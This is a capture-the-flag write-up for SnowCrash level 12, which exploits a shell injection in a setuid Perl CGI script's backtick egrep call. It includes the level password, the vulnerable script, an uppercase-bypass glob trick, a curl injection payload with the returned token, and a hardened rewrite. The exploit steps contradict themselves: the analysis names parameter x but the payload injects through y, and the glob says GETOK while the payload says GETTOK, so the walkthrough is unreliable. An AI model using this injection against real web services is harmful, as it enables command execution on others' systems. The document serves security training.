Level 12
How to log in
username: level12
password: fa6v5ateaw21peobuub8ipe6s
Goal
run getflag as user flag12
Actually doing something
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl*
-r-x------ 1 level12 level12 675 Apr 3 2012 .profile*
Perl again...
level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
    $nn = $_[1];
    $xx = $_[0];
    $xx =~ tr/a-z/A-Z/;
    $xx =~ s/\s.*//;
    @output = `egrep "^$xx" /tmp/xd 2>&1`;
    foreach $line (@output) {
        ($f, $s) = split(/:/, $line);
        if($s =~ $nn) {
            return 1;
        }
    }
    return 0;
}
sub n {
    if($_[0] == 1) {
        print("..");
    } else {
        print(".");
    }
}
n(t(param("x"), param("y")));
A bit more involved this time; let's rename the variables to make it more readable:
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
    $arg2 = $_[1];
    $arg1 = $_[0];
    $arg1 =~ tr/a-z/A-Z/;
    $arg1 =~ s/\s.*//;
    @output = `egrep "^$arg1" /tmp/xd 2>&1`;
    foreach $line (@output) {
        ($f, $s) = split(/:/, $line);
        if($s =~ $arg2) {
            return 1;
        }
    }
    return 0;
}
sub n {
    if($_[0] == 1) {
        print("..");
    } else {
        print(".");
    }
}
n(t(param("x"), param("y")));
When looking at this, we immediately spot an egrep call built from user input inside backticks, meaning we have a shell injection.
Let's look at what ends up in that string.
First of all, the function is called with two arguments; let's call them by their HTTP parameter names, x and y.
In the script they are named arg1 for x and arg2 for y.
arg2 doesn't matter for us, so let's ignore it.
arg1 is converted to uppercase, and then only everything up to the first whitespace is kept;
so, like last time, we want to insert something that terminates the current command:
";cmdhere
The catch is that the command has to be in uppercase (because everything gets converted to uppercase), but the only directory we can write to is /tmp, which is lowercase...
Luckily this doesn't matter since we are in shell land: the glob /*/GETOK expands to /tmp/GETOK, so we can refer to the script without ever typing a lowercase letter.
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
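As an added example (not part of this writeup or of the SnowCrash level itself), here is how level12.pl could be rewritten so that the x parameter never reaches a shell: the key is allow-listed and /tmp/xd is read directly in Perl instead of through backticks. It assumes legitimate keys in /tmp/xd consist only of uppercase letters, digits and underscores.

```perl
#!/usr/bin/env perl
# Hardened rewrite of level12.pl (added example, not the original script)
use strict;
use warnings;
use CGI qw(param);

print "Content-type: text/html\n\n";

sub t {
    my ($x, $y) = @_;
    return 0 unless defined $x && defined $y;

    # Same normalisation as the original: uppercase, keep up to first whitespace.
    $x = uc $x;
    $x =~ s/\s.*//;

    # Allow-list the key: anything outside [A-Z0-9_] is rejected outright, so
    # characters such as ';', '"', '$' or '`' can never reach a shell.
    # (Assumption: legitimate keys in /tmp/xd are alphanumeric.)
    return 0 unless $x =~ /\A[A-Z0-9_]+\z/;

    # No backticks, no egrep: read the file in Perl instead of via a shell.
    open(my $fh, '<', '/tmp/xd') or return 0;
    while (my $line = <$fh>) {
        chomp $line;
        # Equivalent of egrep "^$x": the line must start with the key.
        next unless index($line, $x) == 0;
        my ($f, $s) = split /:/, $line;
        next unless defined $s;
        # The original did $s =~ $y, treating y as a regex; compare it as a
        # literal substring instead so y cannot supply a catch-all pattern.
        if (index($s, $y) >= 0) {
            close $fh;
            return 1;
        }
    }
    close $fh;
    return 0;
}

sub n {
    print($_[0] == 1 ? ".." : ".");
}

n(t(param("x"), param("y")));
```

The SUID bit on a script that shells out is the root of the problem here; even with this fix, a setuid wrapper around a CGI script is something a reviewer should flag.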